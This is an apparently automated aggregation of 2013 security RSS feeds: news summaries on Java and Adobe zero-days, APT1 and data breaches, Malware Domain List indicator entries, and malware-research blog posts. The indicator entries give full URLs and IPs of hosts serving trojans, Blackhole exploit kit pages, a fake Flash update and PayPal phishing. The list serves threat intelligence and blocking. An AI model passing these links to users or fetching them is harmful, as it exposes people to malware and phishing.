http://www.infosecurity-magazine.com/rss/news/ Oracle has updated its February Critical Update to include five new fixes for Java that didnt quite make the earlier cut. The update is critical and should be deployed as soon as possible.

==> CSOs discuss practical approaches to BYOD

http://www.infosecurity-magazine.com/rss/news/ A new report from a group of CSOs discusses real life attitudes and approaches towards solving one of todays most pressing problems: how do you let users attach their own devices to the corporate network without compromising security?

==> Google touts Gmail security

http://www.infosecurity-magazine.com/rss/news/ Spam continues to plague the world of email, but Google, for one, is touting the security of its Gmail platform when it comes to preventing account hijackings. In fact, the company said that it has reduced the number of compromised accounts by 99.7% in just under two years.

==> Apple becomes the latest hacking target, with Mac malware

http://www.infosecurity-magazine.com/rss/news/ The spate of media hacks that has claimed high-profile targets from the New York Times to Facebook has taken a bite out of a new victim. A range of Apple employees have found their Macs infected with a Java-exploiting malware that targets mobile app developers.

==> Too many merchants lack PCI compliance

http://www.infosecurity-magazine.com/rss/news/ Many merchants are failing to meet compliance with the Payment Card Industry Data Security Standard (PCI DSS), putting users credit card data at risk. But the issue isn't complacency, but rather obsolescence: too many stores and restaurants are in desperate need of equipment upgrades.

==> Using social identity as a form of single sign-on

http://www.infosecurity-magazine.com/rss/news/ Consumers are demanding convenient access to more services from more endpoints than ever and organizations need to be able to seize the opportunities that social identity, mobile computing, cloud and other trends naturally create, says Geoff Webb of NetIQ.

==> Security firm accuses Chinese military of involvement in worldwide hacking

http://www.infosecurity-magazine.com/rss/news/ Mandiant, a security firm with a close relationship with both US and UK governments (one of the five companies in GCHQs new Cyber Incident Response scheme) has made the clearest statement yet: the Chinese military is behind the hacking team known as APT1 (aka Comment Crew).

==> French data privacy regulator plans to take on Google

http://www.infosecurity-magazine.com/rss/news/ Frances National Commission for Computing and Civil Liberties (CNIL) has warned Google that its response to earlier demands over its privacy policy are inadequate, and that an action plan against Google would be discussed by the Article 29 Working Party of EU national regulators on February 26.

==> We can’t block YouTube, Egypt’s telecomms authority tells the court

http://www.infosecurity-magazine.com/rss/news/ On February 9, Egypts Judge Hassouna Tawfiq ordered that YouTube be temporarily banned in Egypt for 30 days following Googles refusal to remove the Innocence of Muslims video from YouTube.

==> UK’s Nursing and Midwifery Council fined £150,000 by ICO

http://www.infosecurity-magazine.com/rss/news/ The Nursing and Midwifery Council is the latest public health organization to be fined for the loss of personal and sensitive information in breach of the Data Protection Act.

==> What will the future of enterprise security look like?

http://www.infosecurity-magazine.com/rss/news/ With the year 2020 approaching, join our panel of experts who will examine what near-term advances in information technology may hold, and how enterprises can get ahead of the security curve in anticipation

==> Facebook is the latest media company to admit it was hacked

http://www.infosecurity-magazine.com/rss/news/ On Friday Facebook admitted to being just another hacked media company, joining the New York Times, Washington Post, Wall Street Journal and Twitter in admitting a recent breach although Facebook claims that no user data was lost.

==> ZeroAccess is top bot in home networks

http://www.infosecurity-magazine.com/rss/news/ When it comes to buggy home LANs in the US, the rate of home network infections actually decreased from 13% to 11% in the fourth quarter of 2012 translating to about one in 10 households. But out of that, 6% exhibited high-level threats, such as bots, rootkits and banking trojans, while moderate-level threats included spyware, browser hijackers and adware.

==> Majority of Americans fear cyber war is imminent

http://www.infosecurity-magazine.com/rss/news/ A national survey of Americans shows that a majority fear that cyber warfare is imminent and that the country will attack or be attacked in the next decade. In addition, Americans believe both the government and private sector networks are ill-prepared for a surge in cyber conflict.

==> Apple iWatch could replace passwords

http://www.infosecurity-magazine.com/rss/news/ Ever heard of the Apple iWatch? Recent news reports are claiming that Apple is branching into wearable computing with a smart watch worthy of James Bond, usable for everything from recording conversations to acting as a personal assistant.

==> The zombie apocalypse is more than just a prank – it’s a wake-up call

http://www.infosecurity-magazine.com/rss/news/ On Monday a few TV stations in Michigan, California, Montana and New Mexico broadcast a warning the bodies of the dead are rising from their graves and attacking the living.

==> Jeremy Hammond's legal team seeks judge's recusal

http://www.infosecurity-magazine.com/rss/news/ Hacker Jeremy Hammond is accused of being part of the Stratfor breach. Presiding judge Loretta Preskas husband, Thomas Kavaler, appears on a list of Stratfor victims. Hammonds legal team says this creates an appearance of partiality, and has demanded that Preska be recused.

==> Bug in iPhone 5’s iOS 6.1 bypasses lockscreen

http://www.infosecurity-magazine.com/rss/news/ A bug in iOS 6.1 allows a hacker with physical access to an iPhone 5 to bypass the LockScreen defense to gain access to the phone app and place calls, listen to voice mails and view photos in the contacts section.

==> PCI Council releases mobile payments security guidance for merchants

http://www.infosecurity-magazine.com/rss/news/ The PCI Security Standards Council (PCI SSC) has issued fresh mobility guidance, urging merchants to take a holistic view of the factors and risks that need to be addressed in order to protect card data when using mobile devices to accept payments.

==> 20% of enterprises fall victim to APT attacks

http://www.infosecurity-magazine.com/rss/news/ Advanced persistent threats (APTs) are perhaps the most wolf-like of cybersecurity threats considering their stealthiness, and a new survey has discovered that APTs are making the chickens nervous.

==> Healthcare data breaches wane in 2012

http://www.infosecurity-magazine.com/rss/news/ Healthcare breaches were among the most high-profile of data leakage incidents last year, but a new study in the US found that the damage is actually lessening year-over-year.

==> Cyber-espionage hacktivist campaign targets China's Uyghur population

http://www.infosecurity-magazine.com/rss/news/ A fresh cyber-espionage campaign against Chinas Uyghur community has been uncovered that infects Mac OS X systems using spear-phishing mails. The politically motivated malware then sets about stealing information from hard drives.

==> IT departments don't trust their own security choices

http://www.infosecurity-magazine.com/rss/news/ Curious as to the state of security when it comes to enterprise data? Consider this: one out of five enterprise security professionals in the US say they would not entrust their personal data to their own networks.

==> DDos Vs DDoS mitigation – the latest arms race

http://www.infosecurity-magazine.com/rss/news/ Distributed denial of Service (DDoS) attacks are one of the more serious threats faced by business today, and DDoS mitigation services are a security industry growth area. New malware attempts to mitigate the mitigation.

==> Security is not my responsibility

http://www.infosecurity-magazine.com/rss/news/ At least, it is the security teams responsibility while I am at work, although it is my responsibility while I am at home concludes a new survey into attitudes toward phishing.

==> ACLU: Obama's cybersecurity executive order is privacy-friendly

http://www.infosecurity-magazine.com/rss/news/ President Obama has signed an executive order to protect US critical infrastructure from cyberattacks by improving cybersecurity information sharing between the government and owners/operators of the nations critical infrastructure. Meanwhile, the US House of Representatives is reintroducing the Cyber Intelligence Sharing and Protection Act (CISPA), which passed the House during the last Congress but failed to gain traction in the Senate. According to the ACLU, when it comes to privacy, one of these things is not like the other.

==> Reveton ransomware gang busted by Europol

http://www.infosecurity-magazine.com/rss/news/ The new European Cybercrime Centre (EC3) at Europol, working with the Spanish police and Interpol, has made its first major bust: the Reveton ransomware gang.

==> Latest PDF being exploited – beware of what you open

http://www.infosecurity-magazine.com/rss/news/ Adobe has issued a new security advisory for Adobe Reader and Acrobat on vulnerabilities that are currently being exploited in the wild. The advisory offers a workaround while a patch is being developed.

==> Research shows “dramatic growth” in global cyber attacks

http://www.infosecurity-magazine.com/rss/news/ Data from Websense Labs has identified a dramatic increase in cyber attacks during 2012, led by an astounding 600% increase in malicious web links detected by the companys ThreatSeeker monitoring network.

==> Infosecurity Magazine Launches Information Security Hub on The Guardian website

http://www.infosecurity-magazine.com/rss/news/ Information security is rapidly moving up the board agenda, particularly in light of proposed EU legislation that would compel companies to report cyber breaches. Neelie Kroes, Digital agenda commissioner has said that Europe needs to improve how it deals with cyber security. The concern for businesses is the impact that reporting breaches might have on their corporate reputation and the bottom line.

==> Dropbox chases the corporate market with improved facilities and security

http://www.infosecurity-magazine.com/rss/news/ Dropbox is reported to have around 200 million users; but the majority of these use free accounts and comprise shadow IT (unsanctioned IT) within their companies. Now, with a new dashboard and functions, Dropbox Team seeks the corporate paid-for market.

==> President Obama signs the Cybersecurity Executive Order

http://www.infosecurity-magazine.com/rss/news/ Earlier today, I signed a new executive order that will strengthen our cyber defenses by increasing information sharing, and developing standards to protect our national security, our jobs, and our privacy. Obama, State of the Union address, Tuesday.

==> Former Symantec CEO joins FireEye board

http://www.infosecurity-magazine.com/rss/news/ Enrique T. Salem, former Symantec president and CEO, has joined the FireEye board of directors, the company announced today

==> Retail sector leads the pack for worldwide data breaches

http://www.infosecurity-magazine.com/rss/news/ Shopkeepers, beware: The retail industry is now the top target for cybercriminals, accounting for 45% of security firm Trustwaves data breach investigations last year (a 15% increase from 2011). Overall in 2012, nearly every industry, country and type of data was involved in a breach of some kind, with cybersecurity threats increasing as quickly as businesses can implement measures against them.

==> Five-month malvertising campaign serves up silent infections

http://www.infosecurity-magazine.com/rss/news/ A large malvertising campaign has been serving up malware infections via web advertisements from online marketing services for at least five months, a Symantec investigation has revealed.

==> Data breach incidents more than double, but record exposure declines

http://www.infosecurity-magazine.com/rss/news/ The number of global data breaches reached 2,644 last year, more than doubling the number of incidents in 2011. Despite the rise in frequency, they accounted for the exposure of 267 million records a significant improvement over the 412 million records exposed in 2011.

==> Online authentication boosted by the launch of Nok Nok Labs and FIDO

http://www.infosecurity-magazine.com/rss/news/ Nok Nok Labs, a company that seeks to answer the question, whos there?, is today launched in unison with FIDO, a new industry alliance developing open standards-based authentication mechanisms.

==> Will DRM spyware be built into the next Xbox?

http://www.infosecurity-magazine.com/rss/news/ Rumors are growing that the next Xbox the Xbox 720 (aka Durango) will require that the motion sensing Kinect (currently optional on the Xbox 360) must be connected for the games console to function.

==> Presidential cybersecurity executive order expected Wednesday

http://www.infosecurity-magazine.com/rss/news/ President Obama is expected to issue an executive order to replace last years failed CISPA on Wednesday the same day that Rogers and Ruppersberger have said they will re-introduce the original CISPA.

==> Banking trojans change up their tactics

http://www.infosecurity-magazine.com/rss/news/ Two high-profile banking trojans, Tinba and Tilon, are manifesting simultaneous changes designed to avoid detection by financial security systems. Instead of tampering with an online banking session in real time, both are now serving fake web pages to capture credentials a distinctly remedial approach, researchers say.

==> Mega receives seven 'low-level' vulnerabilities in €10K crypto challenge

http://www.infosecurity-magazine.com/rss/news/ Mega, the recently launched cloud storage service from MegaUpload creator Kim Dotcom, has released the interim results of its cryto-challenge, in which it offers a 10,000 reward to anyone who can break the service's open-source encryption. So far, seven low-level vulnerabilities have been found none of them critical, Mega was at haste to point out.

==> Mobile Malcoders Pay to (Google) Play

http://www.krebsonsecurity.com/feed/ An explosion in malware targeting Android users is being fueled in part by a budding market for mobile malcode creation kits, as well as a bustling market for hijacked or fraudulent developer accounts at Google Play that can be used to disguise malware as legitimate apps for sale. Related Posts: * ZeuS Trojan for Google Android Spotted * Dropbox Now Offers Two-Step Authentication * Beware Scare Tactics for Mobile Security Apps * Critical Security Updates for Adobe Reader, Java * Attackers Hit Weak Spots in 2-Factor Authentication

==> Oracle Issues Emergency Java Update

http://www.krebsonsecurity.com/feed/ Oracle today pushed out the third update in less than a month to fix critical vulnerabilities in its Java software. This patch plugs a dangerous security hole in Java that attackers have been exploiting to break into systems. Related Posts: * Oracle Ships Critical Security Update for Java * Correction to Java Update Story * Critical Java Update Fixes 50 Security Holes * New Java 0-Day Attack Echoes Bit9 Breach * Critical Java Patch Plugs 30 Security Holes

==> KrebsOnSecurity Wins Awards

http://www.krebsonsecurity.com/feed/ I recently returned from San Francisco, which last week hosted the annual RSA Security conference. I had the pleasure of moderating a panel discussion on Raising the Costs of Compromise with some very smart guys, and also shared a stage with several security authors who were recognized for their contributions to infosec media. Related Posts: * Double the Love from Friends and Enemies * KrebsOnSecurity.com Wins Award * Blog Advertising * How to Break Into Security, Grossman Edition * ‘Value of a Hacked PC’ Graphic Goes Global

==> Evernote Forces Password Reset for 50M Users

http://www.krebsonsecurity.com/feed/ Online note-syncing service Evernote is forcing all of its 50 million users to reset their passwords after detecting suspicious activity on its network. Related Posts: * LastPass Forces Users to Pick Another Password * If You Use LinkedIn, Change Your Password * Naming and Shaming the Plaintext Offenders * Dropbox: Password Breach Led to Spam * Password Do’s and Don’ts

==> New Java 0-Day Attack Echoes Bit9 Breach

http://www.krebsonsecurity.com/feed/ Once again, attackers are leveraging a previously unknown critical security hole in Java to break into targeted computers. Interestingly, the malware and networks used by the bad guys in this latest attack match those found in the recently disclosed breach at security firm Bit9. Related Posts: * Oracle Issues Emergency Java Update * Critical Security Updates for Adobe Reader, Java * Oracle Ships Critical Security Update for Java * Zero-Day Java Exploit Debuts in Crimeware * Java Security Update Scrubs 14 Flaws

==> Flash Player Update Fixes Zero-Day Flaws

http://www.krebsonsecurity.com/feed/ Adobe has released an emergency update for its Flash Player software that fixes three critical vulnerabilities, two of which the company warns are actively being exploited to compromise systems. In an advisory, Adobe said two of the bugs quashed in this update (CVE-2013-0643 and CVE-2013-0648)are being used by attackers to target Firefox users. The company [...] Related Posts: * Critical Flash Player Update Fixes 2 Zero-Days * Fat Patch Tuesday * Adobe Ships Election Day Security Update for Flash * Critical Flash Update Fixes Zero-day Flaw * Adobe Patches Critical Flash Flaws

==> Critical Security Updates for Adobe Reader, Java

http://www.krebsonsecurity.com/feed/ Adobe and Oracle each released updates to fix critical security holes in their software. Adobe's patch plugs two zero-day holes that hackers have been using to break into computers via Adobe Reader and Acrobat. Separately, Oracle issued updates to correct at least five security issues with Java. The Java update comes amid revelations by Apple, Facebook and Twitter that employees at these organizations were hacked using exploits that attacked Java vulnerabilities on Mac and Windows machines. According to Bloomberg News, at least 40 companies were targeted in malware attacks linked to an Eastern European gang of hackers that has been trying to steal corporate secrets. Related Posts: * New Java 0-Day Attack Echoes Bit9 Breach * Critical Java Update Fixes 50 Security Holes * Critical Java Patch Plugs 30 Security Holes * Java Security Update Scrubs 14 Flaws * Oracle Ships Critical Security Update for Java

==> Bit9 Breach Began in July 2012

http://www.krebsonsecurity.com/feed/ Cyber espionage hackers who broke into security firm Bit9 initially breached the company's defenses in July 2012, according to evidence being gathered by security experts investigating the incident. Bit9 remains reluctant to name customers that were impacted by the intrusion, but the custom-made malicious software used in the attack was deployed last year in highly targeted attacks against U.S. Defense contractors. Related Posts: * New Java 0-Day Attack Echoes Bit9 Breach * Security Firm Bit9 Hacked, Used to Spread Malware * Source: Washington Post Also Broadly Infiltrated By Chinese… * Oracle Issues Emergency Java Update * Espionage Attacks Against Ruskies?

==> DDoS Attack on Bank Hid $900,000 Cyberheist

http://www.krebsonsecurity.com/feed/ A Christmas Eve cyberattack against the Web site of a regional California financial institution helped to distract bank officials from an online account takeover against one of its clients, netting thieves more than $900,000. Related Posts: * DDoS Attacks Spell ‘Gameover’ for Banks, Victims * FBI Investigating Cyber Theft of $139,000 from Pittsford, NY * Crooks Crank Up Volume of E-Banking Attacks * Cyber Thieves Rob Treasury Credit Union * Uptick in Cyber Attacks on Small Businesses

==> Zero-Day Flaws in Adobe Reader, Acrobat

http://www.krebsonsecurity.com/feed/ Adobe is warning that attackers are exploiting critical flaws in its PDF Reader and Acrobat software to break into vulnerable systems, and that the exploit being used in attacks evades the sandbox protection built into these products. Related Posts: * Attackers Hit New Adobe Reader, Acrobat Flaw * Attackers Exploiting New Acrobat/Reader Flaw * Adobe, Windows Security Patches * Reader, Acrobat Patches Plug 23 Security Holes * Adobe Warns of Critical Flaw in Flash, Acrobat & Reader

==> seodirect-proxy.com (2013/03/05_10:25)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: seodirect-proxy.com/adobe-update.exe, IP address: 101.99.23.176, ASN: 45903, Country: VN, Description: trojan

==> forumkianko.ru:8080 (2013/03/05_15:58)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: forumkianko.ru:8080/forum/links/column.php, IP address: 46.4.77.145, ASN: 24940, Country: DE, Description: Blackhole exploit kit 2.0

==> update90.com (2013/03/04_05:59)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: update90.com/flashplayer/pro11/2/index.php?&_mcnc&af=d0bcd763e2b79e4d675cb83b9c436ca1&of=gTPB-5-usa%20%20&p=y&al=WARNING!%20Your%20Flash%20Player%20may%20be%20out%20of%20date.%20Please%20click%20to%20continue, IP address: 50.17.107.125, ASN: 14618, Country: US, Description: Fake Flash page

==> install.update90.com (2013/03/04_05:59)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: install.update90.com/get/click/a6f26911/?filename=Update&sid=gTPB-5-usa%20&uid=d0bcd763e2b79e4d675cb83b9c436ca1, IP address: 192.34.58.151, ASN: 46652, Country: US, Description: Win32.Adware

==> activeadultproperties.com (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: activeadultproperties.com/wordpress/wp-content/themes/twentyeleven/, IP address: 173.201.231.194, ASN: 26496, Country: US, Description: Loads Blackhole Exploit

==> activeadultproperties.com (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: activeadultproperties.com/wordpress/, IP address: 173.201.231.194, ASN: 26496, Country: US, Description: Loads Blackhole Exploit

==> activeadultproperties.com (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: activeadultproperties.com/, IP address: 173.201.231.194, ASN: 26496, Country: US, Description: Loads Blackhole Exploit

==> keqkkauyyrd.myfw.us (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: keqkkauyyrd.myfw.us/ad/feed.php, IP address: 67.208.74.71, ASN: 33597, Country: US, Description: Blackhole Exploit

==> forumla.ru:8080 (2013/03/04_14:51)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: forumla.ru:8080/forum/links/column.php, IP address: 50.31.1.104, ASN: 32748, Country: US, Description: Blackhole exploit kit 2.0

==> complainpaywall.net (2013/03/04_16:56)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: complainpaywall.net/closest/c93jfi2jf92ifj39ugh2jfo3g.php, IP address: 188.93.211.156, ASN: 49352, Country: RU, Description: Blackhole exploit kit 2.0

==> inanimateweaknesses.net (2013/03/04_16:56)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: inanimateweaknesses.net/closest/c93jfi2jf92ifj39ugh2jfo3g.php, IP address: 188.93.211.156, ASN: 49352, Country: RU, Description: Blackhole exploit kit 2.0

==> aaedeusa.rubbermarbles.com (2013/03/01_12:04)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: aaedeusa.rubbermarbles.com/links/excludes_leads-source-necessary.php, IP address: 63.141.249.227, ASN: 32097, Country: US, Description: Blackhole exploit kit 2.0

==> 888casino-luckystar.net (2013/03/01_12:41)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: 888casino-luckystar.net/discussing/sizes_agreed.php, IP address: 130.185.105.74, ASN: 51191, Country: DE, Description: Blackhole exploit kit 2.0

==> www.x-cite.com (2013/02/28_08:41)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: www.x-cite.com/components/.52qixq.php?receipt=796_1013817823, IP address: 85.214.26.169, ASN: 6724, Country: DE, Description: trojan inside zip file

==> berrybots.net (2013/02/27_12:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: berrybots.net/detects/circulation-comparatively.php, IP address: 195.88.139.78, ASN: 48323, Country: UA, Description: Blackhole exploit kit 2.0

==> s457698295.online.de (2013/02/27_12:58)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: s457698295.online.de/index.php, IP address: 82.165.64.173, ASN: 8560, Country: DE, Description: Paypal phishing

==> New Search System, No More Accounts Needed [1]

http://www.offensivecomputing.net/?q=node/feed The new search system with the updated authentication system is online. There is still some missing functionality but it should let everyone download samples. If you find any problems please let me know. There will be some quirks as we move to the new version of the website. If you find any bugs please let me know on Twitter @openmalware. Danny [1] You still need a Google account to download the samples

==> State of Offensive Computing

http://www.offensivecomputing.net/?q=node/feed I would like to take this time to thank everyone that expressed their support while Offensive Computing was offline. It was a trying time and I really appreciate everyone's support. Without getting into any of the specifics of why the site was offline for two months, we are back and here to stay. There are a couple of people who were instrumental in helping to keep everything up and running. Paul Royal, from the Georgia Tech Information Security Center helped out significantly with hardware and the new home of the site. Kelcey Tietjen also stepped in and helped out tremendously. If you see either of them at some upcoming conferences (hint: Paul is giving a talk at Blackhat) buy them a drink. There are a couple of changes that are going to happen that more accurately reflect the intentions of the site. First, the name will be changing to Open Malware. The new name more accurately reflects the purpose and intention of the site. Way back in 2005 the intention was to make this a place where you could find information related to malware and other types of hacking. As things (and life) have progressed it has changed into a malware research site, specifically with the ability to download malware samples. The domain will be OpenMalware.org in the very near future. The second big item of news is that we will be transitioning to a download-only malware repository in the coming weeks. The blog site will be officially shutting down. There are much better forums maintained by commercial services that have taken up the role of a discussion area. Specifically the /r/ReverseEngineering and /r/Malware sub-Reddits, and OpenRCE are better avenues of communication. I will maintain a static version of the site to archive the old content. To accommodate the new download site, there will be a couple of changes. First, a lot of the back end software has changed. Searches will be faster, more malware will be available, and the overall maintenance will be a lot easier. Second, you will need to have a valid, verified Google Account. Having a Google account allows us to use industry standard authentication, and most importantly not to have to maintain a user database. Get one here if you haven't already. In the meantime new account creation is disabled while we make the transition. Old accounts should work as normal. Finally, we are discontinuing our commercial services. I would like to thank all of our customers for their business. You all helped to support this site and maintain an open service. We will be looking at transitioning to a non-profit status in the coming years. Thanks again, Danny Quist

==> VizSec 2012 Call for Papers Out

http://www.offensivecomputing.net/?q=node/feed VizSec 2012 will be held in mid-October as part of VisWeek in Seattle. Papers are due July 1. The International Symposium on Visualization for Cyber Security (VizSec) is a forum that brings together researchers and practitioners from academia, government, and industry to address the needs of the cyber security community through new and insightful visualization techniques. Co-located this year with VisWeek, the 9th VizSec will provide new opportunities for the usability and visualization communities to collaborate and share insights on a broad range of security-related topics. Accepted papers will appear in the ACM Digital Library as part of the ACM International Conference Proceedings Series. Important research problems often lie at the intersection of disparate domains. Our focus is to explore effective, scalable visual interfaces for security domains, where visualization may provide a distinct benefit, including computer forensics, reverse engineering, insider threat detection, cryptography, privacy, preventing 'user assisted' attacks, compliance management, wireless security, secure coding, and penetration testing in addition to traditional network security. Human time and attention are precious resources. We are particularly interested in visualization and interaction techniques that effectively capture human analyst insights so that further processing may be handled by machines, freeing the analyst for other tasks. For example, a malware analyst might use a visualization system to analyze a new piece of malicious software and then facilitate generating a signature for future machine processing. When appropriate, research that incorporates multiple data sources, such as network packet captures, firewall rule sets and logs, DNS logs, web server logs, and/or intrusion detection system logs, is particularly desirable. More information is on the web site: http://www.ornl.gov/sci/vizsec

==> Scalable, Automated Baremetal Malware Analysis

http://www.offensivecomputing.net/?q=node/feed This week I will be presenting on scalable, automated baremetal malware analysis at Black Hat Europe. My presentation will coincide with the release of NVMTrace, a tool that facilitates automated baremetal sample processing using inexpensive hardware and freely available technologies. More information is available at the following link: Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis If you are attending Black Hat Europe and malware analysis is a topic of interest to you, please attend my talk. If you are interested but will not be in attendance, please let me know and I will make my whitepaper and slide set available to you.

==> BHO Reversing

http://www.offensivecomputing.net/?q=node/feed From a long time for those days (BHO is supported since IE 4.0) malware writers exploit BHO functionality to bully on IE users. Mostly evil BHO has two functionality ( for sure if we talk about bankers): - monitoring/logging requests sending by browser POST dump - password stealing - HTML page code dynamic modification HTML code injection - used for e.g - adding additional form fields intended to obtain, more amount of TAN codes or generally some (...) Read entire post here: BHO Reversing

==> Practical Malware Analysis - A Book Review and Curmudgeonly Rant on the State of Reverse Engineering

http://www.offensivecomputing.net/?q=node/feed Recently I was asked to review a pre-publication copy of Mike Sikorski and Andrew Honigs book Practical Malware Analysis by Nostarch Press. I gave it an enthusiastic review, and I strongly believe this will become the defacto text for learning malware analysis in the future. This is a review of that book, and a short rant on reverse engineering. Before getting into Practical Malware Analysis, I hope you will indulge me in a rant about other books on the reverse engineering topic: They are not pretty. If youve taken one of my classes I recommend a few books for learning reversing, but climbing the steep mountain of pre-requisite material before you can attempt to be somewhat proficient is daunting. Specifically the books I recommended were based off of each individual authors own personal style of reverse engineering with the tools that were available at the time. The field has gotten much more accessible thanks to the awesome tools that are out there from companies like Hex-Rays and Zynamics. Practical Malware Analysis does a good job of tying together the methods of modern malware analysis. While most of the previous texts have done a good job of presenting the state of the art at their time, PMA overviews many of the tools that are in use in the modern day. Part 1 starts off with the basic static techniques, how to set up a virtual environment, and dynamic analysis. These initial steps are the basis for any good reversing environment. What is nice is that these topics arent dwelled on for an entire book. Part 2 goes over the relationships of the Intel architecture, IDA Pro, modern compilers, and the Windows operating system to reverse engineering. Having an understanding of this as it applies to the reversing process is extremely important. Outside implementing a compiler, learning the fundamentals of the architecture is the most important skill a reverser can have for understanding the field. The difference between an adequate reverser and a great reverser lies in the understanding of how the system interactions work. The rest of the book is focused on the advanced topics of dynamic analysis. Part 5 deals with all the ways that malware authors can make your life miserable, from anti-disassembly to packers. Part 6, Special Topics, talks about shellcode analysis, C++ specifics, and the ever-looming threat of 64-bit malware. I suspect that there will be a second edition once 64-bit malware comes in vogue. Overall the book is excellent for those that are new to this field. Experts love to curmudgeonly talk about how nothing is new anymore, everything sucks, and pine for the good old days of reverse engineering with some wire-wrap, a lead pencil, a 9-volt Duracell, and a single LED. If you consider yourself one of these people, reading this book is going to feel a lot like wearing someone elses underwear. If, on the other hand, you read it and put aside your natural skepticism of all things new, you might learn something. I really do like this book. Edit 3/4/2012: I have no financial interest in the book. The only thing I received was a reviewers copy. This was not sponsored or paid for in any way by the authors or publishers. Edit 2/13/2013: There has been a translation to Serbo-Croation of this review by Joanna Milutinovich

==> CAST Slides: Hunting malware with Volatility v2.0

http://www.offensivecomputing.net/?q=node/feed Last week i had a speech at the CAST forum about hunting malware with volatility 2.0. On 40 slides i will introduce the main features of this powerful forensic framework. All memory dumps being discussed are snapshots from infected machines with modern malwares and rootkits. http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf

==> Introduction to IDA Python

http://www.offensivecomputing.net/?q=node/feed The Introduction to IDA Python document by Ero Carrera is one of the better documents on scripting the IDA Pro platform available. After talking with Ero directly, I have received permission to host the PDF directly on Offensive Computing to make it available long-term. Enjoy. Introduction to IDA Python by Ero Carrera Danny

==> CSI:Internet series - Spyeye detection with Volatility v2 and kernel debugging the TDL4 rootkit

http://www.offensivecomputing.net/?q=node/feed Just in case you missed my forensic analysis contributions for the CSI:Internet series on h-online.com... CSI:Internet - A trip into RAM http://www.h-online.com/security/features/CSI-Internet-A-trip-into-RAM-1339479.html CSI:Internet - Open heart surgery http://www.h-online.com/security/features/CSI-Internet-Open-heart-surgery-1350313.html Enjoy!

==> Branch tracing and LBR access from user-mode in windows.

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> Using pre-paged in virtual memory as an anti-dumping and anti-debugging mechanism

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> Context switches and cycle time counting as anti-debug mechanism

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> RTL_USER_PROCESS_PARAMETERS anti-debug

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> Wow64-Specific Anti-Debug Trick

http://www.openrce.org/rss/feeds/blogs written by waleedassar.

==> darkc0de.net

http://www.robtex.com/dns/darkc0de.net.rss Summary --- Darkc0de.net is a domain controlled by two domain name servers at dsredirection.com. Both are on the same IP network. Incoming mail for darkc0de.net is handled by one mail server at isp-inter.net. Darkc0de.net has one IP number (204.13.162.116). Somalital.com, sx40.com, okf.no, coolsmiles.net, wripe.com and at least 80 other hosts point to the same IP and also shares both name servers and mail servers. Moissanitebracelet.com, mistlubrication.com, aislebridal.com, scheda.net, tubeya.com and at least 75 other hosts point to the same IP and also shares name servers. Darmowe-cipeczki.net, goaliecamps.net, flayproxy.com, mazda323performance.com, vipknan.com and at least 70 other hosts point to the same IP and also shares mail servers. Diariopueblasinfronteras.com, textbug.com, mega-specials.com, ipopkreyol.com, fusiombd.com and at least 65 other hosts point to the same IP. Asf.nl, manhours.net, bitadvertiser.com, jaluzitamir.com, detgujarat.com and at least 117 other hosts share both name servers and mail servers with this domain. Wineandlife.com, 5starbombayhotels.com, desksforcomputers.com, timebandits.com, cisanosulneva.com and at least 195 other hosts share name servers with this domain. Searchounds.com, dicsoinary.com, gamesage.com, barstoolssupercenter.com, southendbathrooms.com and at least 114 other hosts share mail servers with this domain. Isp-inter.net and mapleleafmail.com share mail servers under another name with this domain. Darkc0de.com and darkc0de.org are similar domain names. Also check www.darkc0de.net. Darkc0de.net is hosted on a server in Los Angeles, CA, United States. It has four inlinks. Which servers does darkc0de.net use? Darkc0de.net uses the primary name server ns1.dsredirection.com, the two name servers ns1 and ns2.dsredirection.com together, hereafter referred to as "name server group 1", the IPv4 number 204.13.162.116 only and the primary mail server mx.isp-inter.net. related to darkc0de.net The primary name server ns1.dsredirection.com only All of the several thousand of domains that use the primary name server ns1.dsredirection.com use name server group 1 (example: eb2byellowpages.net, thinksexist.com and countryheart.com ). Worth noting is that every fifth of the domains that use name server group 1 use the primary name server ns1.dsredirection.com. The IPv4 number 204.13.162.116 only There are several thousand of domains that only use the IPv4 number 204.13.162.116. * Three quarter of those use only the mail server mx.isp-inter.net (example: root.sheffieldnews.com, flive.com and www.aldultporn.com ). Worth noting is that a third of the domains that only use the mail server mx.isp-inter.net use only the IPv4 number 204.13.162.116. * Three quarter of them use the primary mail server mx.isp-inter.net (example: mail.ggcrcbypass.com, ww.masajbucuresti.com.htmlfacebook.com and underunder.com ). * More than one in seven of them start with "www" (example: www.162by.com, www.salmanimage.com and www.mp4mobilemovie.net ). The two name servers ns1 and ns2.dsredirection.com together There are millions of domains that use name server group 1. * Three quarter of those are under the tld "com" (example: runway404.com, diversionesjunior.com and shayjohnsonatl.com ). * A third of them use only the IPv4 number 208.73.210.27 (example: top-site-2004.info, weaversceramic.com and aby-escotre-vip-paris.com ). * A third of them point only to the IP number 208.73.210.27 (example: floridadivorcelaw.net, indywast.com and newarktrolly.com ). The mail server mx.isp-inter.net only There are several thousand of domains that only use the mail server mx.isp-inter.net. * A third of those use only the IPv4 number 204.13.160.107 (example: indiaoiltenders.com, wwwpa.net and www.letmewatachthis.com ). * A third of them point only to the IP number 204.13.162.116 (example: indiabulles.com, mail.www.bo and obraspublicaspr.com ). * A third of them use only the IPv4 number 204.13.162.116 (example: mavimex.com, filter.100topcamsites.com and eurowrestlers.com ). 